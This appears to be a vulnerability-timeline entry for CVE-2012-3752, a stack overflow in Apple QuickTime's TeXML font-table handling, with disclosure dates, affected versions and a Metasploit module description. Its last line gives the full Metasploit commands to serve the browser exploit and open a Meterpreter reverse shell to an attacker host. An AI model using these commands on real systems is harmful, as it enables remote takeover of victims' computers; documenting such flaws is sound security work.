You can find, by clicking on the following image, a visualization timeline of the main exploitable vulnerabilities of year 2012.
Start date of a slide is corresponding to:
End date of a slide is corresponding to:
Vulnerability reported to vendor by Arezou Hosseinzad-Amirkhizi
Coordinate public release of the vulnerability the 2012-11-05
Metasploit PoC provided by juan vazquez the 2012-11-22
Arezou Hosseinzad-Amirkhizi
juan vazquez
CVE-2012-3752
OSVDB-87087
BID-56557
HT5581
QuickTime 7.7.2 and earlier for Windows
QuickTime 7.7.2
Firefox 3.5.1
This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
use exploit/windows/browser/apple_quicktime_texml_font_table set SRVHOST 192.168.178.26 set TARGET 3 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit sessions -i 1 getuid sysinfo